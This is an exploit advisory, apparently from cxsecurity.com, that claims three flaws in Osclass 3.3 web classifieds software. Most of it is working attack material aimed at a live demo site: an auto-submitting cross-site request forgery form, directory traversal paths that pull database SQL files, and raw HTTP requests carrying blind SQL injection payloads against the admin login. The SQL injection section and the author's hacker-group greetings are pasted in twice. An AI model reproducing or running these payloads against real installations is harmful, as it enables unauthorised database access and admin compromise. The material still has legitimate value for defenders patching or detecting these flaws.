Osclass 3.3 Cross Site Request Forgery / SQL Injection / Traversal

2013.12.16
Credit: R3d-D3v!L
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-22
CWE-352

=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah The Mercifull}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- [~] Vendor: http://osclass.org [+] Software:Osclass [+] Version : 3.3 [~] [~] author: R3d-D3v!L [+] TEAM: ABH [?] contact: X[at]hotmail.co.jp [-] [?] Date: 14.d3c.2ol3 [?] T!ME: 04:54 am GMT [?] Home: soon [^] [?] =============================================================================== #Osclass v3.3 suffering from CSRF Vulnerability =============================================================================== [!] Exploit Already Tested ... on apache [^] Error console:- /general/index.php [?] proof of concept : <html> <body onload="javascript:document.forms[0].submit()"> <form name="<empty>" action="http://demo.osclass.org/general/index.php" method=GET enctype="multipart/form-data"> <input type=hidden size=30 maxlength=30 name=page value=""> <input type=hidden size=30 maxlength=30 name=sOrder value=""> <input type=hidden size=30 maxlength=30 name=iOrderType value=""> <td><input type=text size=30 maxlength=250 name=sPattern value=""></td> <td><input type=text size=30 maxlength=100 name=sCity value=""></td> <td><input type=text size=30 maxlength=100 name=sRegion value=""></td> <td><input type=Checkbox size=10 maxlength=10 name=bPic value=""></td> <td><input type=text size=30 maxlength=250 name=sPriceMin value=""></td> <td><input type=text size=30 maxlength=100 name=sPriceMax value=""></td> <td><input type=Checkbox size=10 maxlength=10 name=sCategory value=""></td> <input type=submit class=button value='Save'> </form> </html> =============================================================================== #Osclass v3.3 suffering from directory traversal Vulnerability =============================================================================== [!] Exploit Already Tested ... on apache [^] Error console:- directory traversal allow to dump db [?] proof of concept : /general/oc-content/languages/en_US/mail.sql /general/oc-includes/osclass/installer/basic_data.sql /general/oc-includes/osclass/installer/pages.sql [?]live exploit http://demo.osclass.org/general/oc-content/languages/en_US/mail.sql =============================================================================== #Osclass v3.3 suffering from Blind sql injection Vulnerability =============================================================================== [!] Exploit Already Tested ... on apache [^] Error console:- 1*-URL encoded GET input action was set to -1' or 18 = '16 2*-URL encoded POST input action was set to -1" or 34 = "31 [?] proof of concept : 1* - /general/oc-admin/index.php 2* - /general/index.php1*- RequestGET /general/oc-admin/index.php?action=-1%27%20or%2018%20%3d%20%2716&page=login HTTP/1.1 X-Requested-With: XMLHttpRequest Cookie: osclass=1cdd2642f3187eedcfa8b959300d08e2; 9abe5=oc_adminId._.oc_adminSecret._.oc_adminLocale%261._.7VIeKmoH._.it_IT Host: demo.osclass.org Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept: */* 2*- POST /general/index.php HTTP/1.1 Content-Length: 246 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Cookie: osclass=1cdd2642f3187eedcfa8b959300d08e2 Host: demo.osclass.org Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept: */* action=-1%22%20or%2034%20%3d%20%2231&CSRFName=CSRF83497906_1588898183&CSRFToken=dbdd20b65f0a882be3c6629ec1d975be69c2668cdb8e75aa2b5a42f5d031b66cbaf4073567b352024e09fe04ba358c6186d1e58e1493822005a88893363a1f9d&page=login&s_email=sample%40email.tst [~]-----------------------------{(??d-D?V!L)}------------------------------------------------ # [~] Greetz tO: virus_jordan & & H@CK3R M!ND & Syrianoo ??k??g & ????k ??stor? & Netikerty Asenet ...etc ; # [~] 70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ # ; # [~] special thanks :all soqor members & xp10 # ; # [?] special SupPoRT : packet storm & 1337day & Maksymilian Arciemowicz # ; # [?]---> ((R3d D3v!L<---palestine phoneix--->JUPA<---aNd--->Devil ro0t)) #; # [~]spechial FR!ND: they all are spechials ;) #; # [~] !'M 4R48!4N 3XPL0!73R. #; # [~](>D!R 4ll 0R D!E<) #; # [~]--------------------------------------------------------------------------------------------- =-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah The Mercifull}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- [~] Tybe: suffering from CSRF Vulnerability [~] Vendor: http://osclass.org [+] Software:Osclass [+] Version : 3.3 [~] [~] author: R3d-D3v!L [+] TEAM: ABH [?] contact: X[at]hotmail.co.jp [-] [?] Date: 14.d3c.2ol3 [?] T!ME: 04:54 am GMT [?] Home: soon [^] [?] =============================================================================== #Osclass v3.3 suffering from Blind sql injection Vulnerability =============================================================================== [!] Exploit Already Tested ... on apache [^] Error console:- 1*-URL encoded GET input action was set to -1' or 18 = '16 2*-URL encoded POST input action was set to -1" or 34 = "31 [?] proof of concept : 1* - /general/oc-admin/index.php 2* - /general/index.php1*- RequestGET /general/oc-admin/index.php?action=-1%27%20or%2018%20%3d%20%2716&page=login HTTP/1.1 X-Requested-With: XMLHttpRequest Cookie: osclass=1cdd2642f3187eedcfa8b959300d08e2; 9abe5=oc_adminId._.oc_adminSecret._.oc_adminLocale%261._.7VIeKmoH._.it_IT Host: demo.osclass.org Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept: */* 2*- POST /general/index.php HTTP/1.1 Content-Length: 246 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Cookie: osclass=1cdd2642f3187eedcfa8b959300d08e2 Host: demo.osclass.org Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept: */* action=-1%22%20or%2034%20%3d%20%2231&CSRFName=CSRF83497906_1588898183&CSRFToken=dbdd20b65f0a882be3c6629ec1d975be69c2668cdb8e75aa2b5a42f5d031b66cbaf4073567b352024e09fe04ba358c6186d1e58e1493822005a88893363a1f9d&page=login&s_email=sample%40email.tst [~]-----------------------------{(??d-D?V!L)}------------------------------------------------ # [~] Greetz tO: virus_jordan & & H@CK3R M!ND & Syrianoo ??k??g & ????k ??stor? & Netikerty Asenet ...etc ; # [~] 70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ # ; # [~] special thanks :all soqor members & xp10 # ; # [?] special SupPoRT : packet storm & 1337day & Maksymilian Arciemowicz # ; # [?]---> ((R3d D3v!L<---palestine phoneix--->JUPA<---aNd--->Devil ro0t)) #; # [~]spechial FR!ND: they all are spechials ;) #; # [~] !'M 4R48!4N 3XPL0!73R. #; # [~](>D!R 4ll 0R D!E<) #; # [~]---------------------------------------------------------------------------------------------


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top